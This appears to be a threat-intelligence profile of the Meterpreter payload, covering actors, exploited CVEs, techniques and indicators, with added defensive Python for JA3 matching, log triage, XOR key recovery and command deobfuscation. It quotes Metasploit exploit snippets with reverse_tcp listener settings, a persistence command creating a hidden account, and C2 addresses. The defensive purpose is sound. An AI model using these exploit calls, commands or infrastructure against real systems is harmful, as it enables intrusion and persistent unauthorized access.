Meterpreter
Meterpreter is a Metasploit post-exploitation payload and backdoor used to provide interactive remote control of compromised systems. The content describes reverse shells and bind shells, including reverse_tcp and reverse_http variants, and notes that Meterpreter can be delivered as shellcode, DLL-based stagers, or additional payloads dropped by other malware. Reported behavior includes remote command execution, post-exploitation activity inside victim networks, use as a full remote toolset, and deployment after initial compromise for persistence, lateral movement, credential theft, and follow-on payload delivery. The content also notes in-memory execution via shellcode loaders, including execution through VirtualProtect and CreateThread, and references default use of TCP 4444 for reverse shell connectivity. Meterpreter is associated with Metasploit and is frequently observed alongside tools such as Cobalt Strike, Mimikatz, PsExec, and PowerShell.
Across the provided reporting, Meterpreter was used by multiple threat actors and intrusion sets, including TA505/Hive0065, Mustang Panda, FIN12, MuddyWater, Kimsuky, Cinnamon Tempest, and actors involved in OlympicDestroyer-related intrusions. It was also observed in ransomware-linked activity, including Black Basta-associated intrusion activity and RHYSIDA operators using SYSTEMBC to inject Meterpreter shellcode. Targeting in the content spans enterprise environments, healthcare, government, NGOs, political organizations, telecoms, universities, and South Korean IIS web servers. Infection and delivery vectors mentioned include spear-phishing documents with macros, malicious archives and LNK files, DLL sideloading, compromised web servers, shellcode loaders, malvertising-delivered payload chains, and exploitation of public-facing applications such as Atlassian Confluence.
High-confidence indicators and artifacts directly mentioned in the content include Meterpreter reverse shell connections to 91.214.124.20 and 91.214.124.25 in TA505 activity, a Meterpreter C2 at 43.156.50.76 in South Korean IIS server compromises, default listener port TCP 4444, and the JA3 fingerprint 5d65ea3fb1d4aa7d826733d2f2cbbb1d for Metasploit Meterpreter running on Linux. The content also references detection of Meterpreter-like DLL characteristics, use of Go-based Meterpreter by Kimsuky, and repeated observation of Meterpreter as a common commodity post-exploitation framework and C2 family in global intrusion reporting.
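The JA3 value quoted above is an MD5 over a canonical list of ClientHello fields, so it can be recomputed from any TLS metadata source that exposes those fields. The Python below is an added example, not code from the page or from Metasploit: it rebuilds the JA3 string from constructed ClientHello parameters, strips GREASE values the way JA3 does, and checks the resulting hash against a known-bad set. The sample parameters are illustrative and are not taken from a Meterpreter capture.

```python
import hashlib
from typing import Any, Dict, Iterable, List, Sequence, Set

# GREASE values (RFC 8701) are randomised per connection, so JA3 removes them
# from the cipher, extension and curve lists before hashing.
GREASE = {0x0a0a, 0x1a1a, 0x2a2a, 0x3a3a, 0x4a4a, 0x5a5a, 0x6a6a, 0x7a7a,
          0x8a8a, 0x9a9a, 0xaaaa, 0xbaba, 0xcaca, 0xdada, 0xeaea, 0xfafa}


def _strip_grease(values: Iterable[int]) -> List[int]:
    return [v for v in values if v not in GREASE]


def ja3_string(version: int, ciphers: Sequence[int], extensions: Sequence[int],
               curves: Sequence[int], point_formats: Sequence[int]) -> str:
    """Canonical JA3 string: Version,Ciphers,Extensions,Curves,PointFormats.

    Every field is decimal, list items are '-' separated and keep ClientHello
    order; an empty list becomes an empty field.
    """
    return ",".join([
        str(version),
        "-".join(str(c) for c in _strip_grease(ciphers)),
        "-".join(str(e) for e in _strip_grease(extensions)),
        "-".join(str(g) for g in _strip_grease(curves)),
        "-".join(str(p) for p in point_formats),
    ])


def ja3_hash(ja3: str) -> str:
    """JA3 fingerprint: lowercase hex MD5 of the JA3 string."""
    return hashlib.md5(ja3.encode("ascii")).hexdigest()


def matches_known(hello: Dict[str, Any], known: Set[str]) -> bool:
    """True when the ClientHello's JA3 is in a set of known-bad fingerprints."""
    return ja3_hash(ja3_string(**hello)) in known


# Fingerprint quoted in the reporting for Metasploit Meterpreter on Linux.
METERPRETER_LINUX_JA3 = "5d65ea3fb1d4aa7d826733d2f2cbbb1d"

# Constructed ClientHello parameters for illustration; they are NOT from a
# Meterpreter capture. 0x0303 = TLS 1.2 (771), 0x1301/0x1302 = TLS 1.3 suites,
# 0x0a0a = a GREASE value that must not reach the hash.
SAMPLE_HELLO: Dict[str, Any] = {
    "version": 0x0303,
    "ciphers": [0x0a0a, 0x1301, 0x1302, 0xc02c, 0xc030],
    "extensions": [0x0000, 0x0017, 0xff01, 0x000a, 0x000b, 0x0a0a],
    "curves": [0x0a0a, 0x001d, 0x0017],
    "point_formats": [0],
}

if __name__ == "__main__":
    s = ja3_string(**SAMPLE_HELLO)
    print(s)  # 771,4865-4866-49196-49200,0-23-65281-10-11,29-23,0
    print(ja3_hash(s), "known-bad:", matches_known(SAMPLE_HELLO, {METERPRETER_LINUX_JA3}))
```

Because JA3 hashes the client's advertised parameters rather than anything about the server, a single value such as the one above identifies the TLS stack the payload was built with; treat a hit as a pivot for further triage, since other tooling built on the same library will share it.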
Vulnerabilities exploited
11 CVEs correlated with this family across public research and vendor advisories.
On the 6th of April 2022, NCC Group’s Fox-IT discovered two separate flaws in FUJITSU CentricStor Control Center V8.1 which allow an attacker to gain remote code execution on the appliance without prior authentication or authorization. These are tracked as CVE-2022-31794 and CVE-2022-31795.
'DefaultOptions' => { 'Payload' => 'windows/meterpreter/reverse_tcp' } ... 'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }
WICKED PANDA ... began 2020 by conducting a wide-ranging campaign focused on exploiting multiple vulnerabilities (CVE-2019-19781 and CVE-2020-10189) ... Upon successful exploitation, they deployed Cobalt Strike and Meterpreter payloads
The following analytic detects driver load errors in the Windows PrintService Admin logs, specifically identifying issues related to CVE-2021-34527 (PrintNightmare). It triggers on error messages indicating the print spooler failed to load a plug-in module, such as "meterpreter.dll," with error code 0x45A.
Metasploit uses printf to write the Meterpreter stager to disk in roughly 20-byte chunks (each exploit attempt must fit within a 26-byte buffer), which is quite slow.
Table 1: Filenames and hashes of files used by a threat actor. Filename / MD5: t.py (tied to a scheduled task; Python Meterpreter reverse shell, port 9090) ... g.py (tied to a scheduled task; Python Meterpreter reverse shell, port 8088) ...
Analysts confirmed that nation-state advanced persistent threat (APT) actors exploited CVE-2022-47966 to gain unauthorized access to a public-facing application (Zoho ManageEngine ServiceDesk Plus), establish persistence, and move laterally through the network. This vulnerability allows for remote code execution on the ManageEngine application.
A threat actor exploited CVE-2023-46604 on an internet-facing Apache ActiveMQ server... The threat actor was able to perform remote code execution (RCE) by using a Java Spring class and a custom Java Spring bean configuration XML file.
Threat actors are actively exploiting a recently disclosed critical vulnerability, tracked as CVE-2026-1731 (CVSS score: 9.9), in BeyondTrust Remote Support (RS) and Privileged Remote Access (PRA). The bug could allow an unauthenticated attacker to send specially crafted requests and run operating system commands remotely, without logging in.
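The PrintNightmare analytic quoted above keys on a single spooler error: a plug-in module that failed to load with code 0x45A. As an added example, not the analytic's own code, the Python below applies that logic to constructed PrintService/Admin event records. The Event ID 808 value and the 0x45A (ERROR_DLL_INIT_FAILED) meaning are taken from public PrintNightmare detection guidance and are assumptions of this example; the sample messages are made up.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Microsoft-Windows-PrintService/Admin Event ID 808: "The print spooler failed
# to load a plug-in module <path>, error code <code>." Both the ID and the
# 0x45A (ERROR_DLL_INIT_FAILED) value come from public PrintNightmare detection
# guidance and are assumptions of this example, not values from the page.
SPOOLER_PLUGIN_LOAD_FAILED = 808
ERROR_DLL_INIT_FAILED = 0x45A

MESSAGE_RE = re.compile(
    r"failed to load a plug-in module\s+(?P<path>\S+?),\s*error code\s+(?P<code>0x[0-9A-Fa-f]+)",
    re.IGNORECASE,
)


@dataclass
class Finding:
    event_id: int
    module: str
    error_code: int
    notes: str


def triage_event(event_id: int, message: str) -> Optional[Finding]:
    """Return a Finding for an 808 plug-in load failure with 0x45A, else None."""
    if event_id != SPOOLER_PLUGIN_LOAD_FAILED:
        return None
    m = MESSAGE_RE.search(message)
    if not m:
        return None
    code = int(m.group("code"), 16)
    if code != ERROR_DLL_INIT_FAILED:
        return None
    path = m.group("path")
    notes = "plug-in load failure with 0x45A"
    # Added weight: the DLL sits in the spooler driver store, the location
    # PrintNightmare exploitation writes to, and carries a non-vendor name.
    if "\\spool\\drivers\\" in path.lower():
        notes += "; module under spool\\drivers"
    return Finding(event_id, path, code, notes)


def triage_log(events: List[Tuple[int, str]]) -> List[Finding]:
    """Run triage_event over (event ID, message) pairs and keep the hits."""
    return [f for f in (triage_event(eid, msg) for eid, msg in events) if f]


# Constructed event records (event ID, message text); not real log data.
SAMPLE_EVENTS = [
    (808, r"The print spooler failed to load a plug-in module C:\Windows\system32\spool\DRIVERS\x64\3\New\meterpreter.dll, error code 0x45A. See the event user data for context information."),
    (808, r"The print spooler failed to load a plug-in module C:\Windows\system32\spool\DRIVERS\x64\3\vendorui.dll, error code 0x7E. See the event user data for context information."),
    (372, r"The document Print Document, owned by alice, failed to print on printer HP-Floor2."),
    (808, r"The print spooler failed to load a plug-in module C:\Users\Public\update.dll, error code 0x45a. See the event user data for context information."),
]

if __name__ == "__main__":
    for f in triage_log(SAMPLE_EVENTS):
        print(f"EID {f.event_id} {f.module} ({f.error_code:#x}): {f.notes}")
```

The 0x7E case (module not found) is deliberately left out: a missing vendor DLL is common noise, whereas 0x45A means the module was found and its DllMain refused to initialise, which is what happens when the spooler loads a payload DLL that was never written to behave as a print driver.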
Groups observed using it
22 distinct threat actors attributed by public researchers.
Tools: SpicyOmelette, Cobalt Strike, Meterpreter, Mimikatz, CobtInt, ATMSpitter, Carbanak, Buhtrap, Cyst, Metasploit.
AhnLab reported that the Kimsuky group has used a Go language version of Meterpreter, and subsequent discoveries include additional Go-based malware like Troll Stealer and GoBear.
Cinnamon Tempest has used open-source tools including customized versions of the Iox proxy tool, NPS tunneling tool, Meterpreter, and a keylogger that uploads data to Alibaba cloud storage.
Another type of stager used by Mustang Panda, some as recently as late 2021, are DLL-based implants that decode and execute Meterpreter reverse-HTTP payloads to download and execute even more payloads from the C2.
The hackers used well known tools, including Meterpreter, Mimikatz, Lazagne, Invoke-Obfuscation, and more.
The PowerShell-based EMPIRE post-exploitation framework was used by FIN12 nearly exclusively until mid-2019 when they began to also use Cobalt Strike (BEACON), and intermittently Metasploit (METERPRETER).
"...they deployed Cobalt Strike and Meterpreter payloads to further interact with victims."
For remote access, YoroTrooper has also deployed commodity malware, such as AveMaria/Warzone RAT, LodaRAT and Meterpreter.
"The Operation Transparent Tribe report suggested that Meterpreter samples were used as payloads in the campaign..."
While all payloads can be dynamically updated, at the time of delivery, this task launched a COM scriptlet (“.sct” file extension) that downloaded and executed Meterpreter hosted on images.chinabytes[.]info.
Ember Bear has also used reverse TCP connections from Meterpreter installations to communicate back with C2 infrastructure.
UNC2198 has used Cobalt Strike BEACON, Metasploit METERPRETER, KOADIC, and PowerShell EMPIRE offensive security tools during this phase as well.
The unpacked shellcode is a Meterpreter payload from the offensive security framework, Metasploit... Meterpreter was observed being used to collect the SAM database using the hashdump module.
When m6699.exe executes, the threat actor can establish a Meterpreter session for remote command execution.
“...utilizes commonly used remote control tools like Cobalt Strike, PlugX, or Meterpreter stagers interchangeably in various attack stages.”
Both initial infection vectors delivered first-stage downloader malware to targets. The downloaders retrieved XOR-encoded versions of Meterpreter shellcode.
The IP also hosted a Meterpreter executable around the time this campaign was going on.
"FIN7 used CARBANAK’s tinymet command to spawn Meterpreter instances and give unwitting operators access to targets..."
Techniques & procedures
32 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 technique
The content repeatedly states that threat actors 'obtained,' 'acquired,' or 'used' publicly available, open-source, legitimate, or modified tools such as Mimikatz, Cobalt Strike, PsExec, Empire, Impacket, and many others.
Initial Access
3 techniques
rpc.call("module.execute", "exploit", "unix/webapp/thinkphp_rce", {"RHOSTS"=> "127.0.0.1", "RPORT"=> "80", "LHOST"=>"192.168.0.148", "LPORT"=>"4444"})
Cisco Talos began observing the China-based threat actor Mustang Panda conducting phishing campaigns against European entities... Some phishing messages contain malicious lures masquerading as official European Union reports... Other phishing emails deliver fake 'official' Ukrainian government reports.
The threat actor heavily relies on sending lures via phishing emails to achieve initial infection. These lures often masquerade as legitimate documents of national and organizational interest to the targets.
Execution
11 techniques
Windows operating systems provide a utility (schtasks.exe) which enables system administrators to execute a program or a script at a specific given date and time. This kind of behavior has been heavily abused by threat actors and red teams as a persistence mechanism.
References https://attack.mitre.org/techniques/T1053/ ... The persistence technique of scheduled tasks can be implemented both manually and automatically.
include Msf::Exploit::Powershell
...
if target.name == 'Windows'
  win_obj = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { remove_comspec: true })
  win_obj.prepend('cmd.exe /c ')
...
def execute_command(cmd, _opts = {})
  cmd.prepend('/bin/sh -c ')
The malicious macros contain two more components that are dropped to disk on the infected system.
The SLMAIL 5.5 POP3 Server has a public vulnerability (CVE-2003-0264) based on a buffer overflow on the stack that can be triggered by abusing the parameter “password” when a user attempts the authentication process.
Social engineering: Disguising the initial executable as a legitimate document to trick the target into opening it, thereby starting the infection chain.
Persistence
5 techniques
Windows operating systems provide a utility (schtasks.exe) which enables system administrators to execute a program or a script at a specific given date and time. This kind of behavior has been heavily abused by threat actors and red teams as a persistence mechanism.
References https://attack.mitre.org/techniques/T1053/ ... The persistence technique of scheduled tasks can be implemented both manually and automatically.
After installing the Meterpreter backdoor and the HTran port-forwarding tool, the attacker created an attacker-controlled account on the target system with the net command in order to maintain persistence and secure a foothold. ... 2024.04.09 05:04:51 net user kr$ test123!@# /add
A Meterpreter reverse shell was used... it was installed as a service using the execution of an encoded PowerShell script... execute malicious services and persistence mechanisms, namely SDBbot RAT Loaders.
Privilege Escalation
6 techniques
Windows operating systems provide a utility (schtasks.exe) which enables system administrators to execute a program or a script at a specific given date and time. This kind of behavior has been heavily abused by threat actors and red teams as a persistence mechanism.
References https://attack.mitre.org/techniques/T1053/ ... The persistence technique of scheduled tasks can be implemented both manually and automatically.
BUMBLEBEE has Rabbort.DLL embedded, using it for process injection... shi Injects task’s data into a new process... dij Injects task’s data into a new process.
A Meterpreter reverse shell was used... it was installed as a service using the execution of an encoded PowerShell script... execute malicious services and persistence mechanisms, namely SDBbot RAT Loaders.
The stager begins by creating persistence for itself across reboots via the registry Run key...
In Windows environments, when an application or a service is starting it looks for a number of DLLs in order to function properly... then it is possible to escalate privileges by forcing the application to load and execute a malicious DLL file.
Stealth
5 techniques
BUMBLEBEE has Rabbort.DLL embedded, using it for process injection... shi Injects task’s data into a new process... dij Injects task’s data into a new process.
Alternate data streams (ADS) are a little-known but potent feature of the NTFS file system that enable data to be hidden within files without altering their visible size or content. Cybercriminals are increasingly using ADS to hide malicious payloads, tools, or data in a way that bypasses traditional detection methods.
This malicious DLL needs to be dropped in one of the folders from which Windows loads DLL files. As can be seen below, when the service restarted a Meterpreter session opened with SYSTEM privileges through DLL hijacking.
If these DLLs don't exist or are implemented in an insecure way (DLLs are called without using a fully qualified path), then it is possible to escalate privileges by forcing the application to load and execute a malicious DLL file.
The implant will download this file directly into memory. It then sets the area of memory via the VirtualProtect Windows API call to executable by passing in 0x40, and then executes it via the CreateThread call... Unlike the loader, the implant does not write the downloaded shellcode file to disk before execution.
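Several of the reports above describe Meterpreter shellcode arriving XOR-encoded and then being executed in memory (VirtualProtect with 0x40, then CreateThread) without ever touching disk. For an analyst who has recovered the encoded blob from a loader's resources or a network capture, the added example below (not from the page or from Metasploit) brute-forces a single-byte XOR key by looking for the leading bytes of the stock Windows stagers. The plaintext used is the opening of Metasploit's x64 block_api stager as commonly published, XOR-encoded here with a made-up key; the prefixes are an assumption about current Metasploit output.

```python
from typing import Dict, Optional, Tuple

# Leading bytes of the stock Metasploit Windows stagers, used here as known
# plaintext: x86 opens with "cld; call" (FC E8 ...) and x64 with
# "cld; and rsp,-16; call" (FC 48 83 E4 F0 ...). These prefixes are an
# assumption about current Metasploit output, not values from the page.
KNOWN_PREFIXES: Dict[str, bytes] = {
    "windows x86 stager": bytes.fromhex("fce8"),
    "windows x64 stager": bytes.fromhex("fc4883e4f0"),
}


def xor_single_byte(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def recover_single_byte_key(blob: bytes) -> Optional[Tuple[int, str]]:
    """Brute-force a one-byte XOR key by testing every key against the known
    stager prefixes. Returns (key, stager name) or None; key 0 means the blob
    was not encoded at all."""
    longest = max(len(p) for p in KNOWN_PREFIXES.values())
    window = blob[:longest]
    for key in range(256):
        head = xor_single_byte(window, key)
        for name, prefix in KNOWN_PREFIXES.items():
            if len(head) >= len(prefix) and head.startswith(prefix):
                return key, name
    return None


def decode_stager(blob: bytes) -> Optional[Tuple[str, bytes]]:
    """Decode the whole blob once a key is found."""
    hit = recover_single_byte_key(blob)
    if hit is None:
        return None
    key, name = hit
    return name, xor_single_byte(blob, key)


# Constructed sample: the first 17 bytes of the x64 block_api stager, XOR'd
# with a made-up key. A real blob would be the full downloaded payload.
X64_STAGER_HEAD = bytes.fromhex("fc4883e4f0e8c000000041514150525156")
SAMPLE_KEY = 0x5A
ENCODED_SAMPLE = xor_single_byte(X64_STAGER_HEAD, SAMPLE_KEY)

if __name__ == "__main__":
    result = decode_stager(ENCODED_SAMPLE)
    if result:
        name, plain = result
        print(name, plain[:8].hex())  # windows x64 stager fc4883e4f0e8c000
```

A multi-byte or rolling key needs more known plaintext than these short prefixes give, and a packed or position-independent-encoded stage (shikata_ga_nai and similar) will not start with them at all; in those cases the reliable route is the one the reporting describes, letting the loader decode the buffer and dumping the region it marks executable.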
Discovery
3 techniques
Use in conjunction with other contextual indicators, for example detect Network discovery and Lateral movement attempts by unusual hassh such as those used by Paramiko, Powershell, Ruby, Meterpreter, Empire.
Before installing the Meterpreter backdoor on the web server, the attacker ran a variety of legitimate utilities such as ipconfig and systeminfo. This appears to have been intended to collect information about the target prior to installing the IIS module malware.
The commands executed were used for discovery purposes, listing members of privileged groups and network information.
Lateral Movement
3 techniques
GOLD KINGSWOOD is a cybercriminal group that uses tactics more commonly associated with government-sponsored threat actors to infiltrate the internal networks of financial institutions around the globe.
The actor used the initially compromised system to escalate privileges and move laterally across additional systems on the network.
Use in conjunction with other contextual indicators, for example detect Network discovery and Lateral movement attempts by unusual hassh such as those used by Paramiko, Powershell, Ruby, Meterpreter, Empire.
Command and Control
4 techniques
"via_payload"=>"payload/linux/x64/meterpreter/reverse_tcp", "desc"=>"Meterpreter", "tunnel_local"=>"192.168.0.148:4444"
After installing the Meterpreter backdoor, the attacker went on to install the HTran utility through the w3wp.exe process. HTran is a port-forwarding tool whose source code is publicly available on GitHub.
This script then executes within the context of the Android application and can potentially instruct the device to download a malicious payload from the attacker’s server, providing access to the user’s phone with the privileges of the application.
SDBbot RAT has been observed... This malware features remote-access capabilities, accepts commands from a C&C server such as video recording, and has the ability to exfiltrate data from the victimized devices and networks.
IOCs tracked for this family
79 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
104 sources tracked across advisories, community write-ups, and news.
Referenced as an example of a real-world implant/payload used in exploitation workflows.
Referenced as malware/tooling observed using Windows command obfuscation via environment variable substring extraction to hide command intent.
Meterpreter is referenced as the payload downloaded after Confluence exploitation, providing the attacker full control over the compromised server.
Meterpreter is referenced as a Metasploit payload used to generate a malicious DLL that provides reverse shell/backdoor access to a victim system.
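The environment-variable substring trick noted above (`%VAR:~start,len%`) lets an operator spell a command out of characters already present in variables such as COMSPEC, so the logged command line shows no recognisable verb. The added Python below, not code from the page or from any of the cited reports, reimplements cmd.exe's substring and search/replace expansion so such a line can be rendered readable offline. The environment values and the obfuscated line are constructed (its arguments echo the `net user` command quoted earlier on this page); the `%%` literal and the `*`-prefixed replace form are left out.

```python
import re
from typing import Mapping

# One cmd.exe expansion token: %NAME%, %NAME:~start[,len]% or %NAME:old=new%.
TOKEN_RE = re.compile(r"%(?P<name>[^%:=\s]+)(?::(?P<spec>[^%]*))?%")


def _substring(value: str, body: str) -> str:
    """Apply cmd.exe's ~start[,len] rules: a negative start counts from the
    end, a negative len drops that many characters from the end."""
    start_s, _, len_s = body.partition(",")
    start = int(start_s or 0)
    n = len(value)
    if start < 0:
        start = max(n + start, 0)
    if start >= n:
        return ""
    if not len_s:
        return value[start:]
    length = int(len_s)
    end = n + length if length < 0 else start + length
    return value[start:end] if end > start else ""


def _replace(value: str, body: str) -> str:
    """Apply %VAR:old=new%; cmd matches 'old' case-insensitively."""
    old, _, new = body.partition("=")
    if not old:
        return value
    return re.sub(re.escape(old), lambda _m: new, value, flags=re.IGNORECASE)


def expand(command: str, env: Mapping[str, str]) -> str:
    """Expand every %VAR...% token in one left-to-right pass, as cmd.exe does
    for a command line. Undefined variables are left as written so the analyst
    can see which values the operator relied on."""
    upper_env = {k.upper(): v for k, v in env.items()}

    def repl(m: "re.Match[str]") -> str:
        value = upper_env.get(m.group("name").upper())
        if value is None:
            return m.group(0)
        spec = m.group("spec")
        if spec is None:
            return value
        if spec.startswith("~"):
            return _substring(value, spec[1:])
        if "=" in spec:
            return _replace(value, spec)
        return m.group(0)

    return TOKEN_RE.sub(repl, command)


# Constructed environment and command line; the net user arguments echo the
# account-creation command quoted in the reporting above.
SAMPLE_ENV = {
    "COMSPEC": r"C:\Windows\system32\cmd.exe",
    "PUBLIC": r"C:\Users\Public",
}
OBFUSCATED = "%COMSPEC:~-7,3% /c %COMSPEC:~5,1%%COMSPEC:~15,1%%COMSPEC:~14,1% user kr$ test123!@# /add"

if __name__ == "__main__":
    print(expand(OBFUSCATED, SAMPLE_ENV))  # cmd /c net user kr$ test123!@# /add
```

Expansion depends on the victim's actual environment: a custom COMSPEC or a renamed Windows directory changes every index, so when the host is available take the values from its process-creation telemetry rather than assuming defaults. Detection should key on the token shape itself (`%...:~...%` sequences in a command line) rather than on any particular decoded verb.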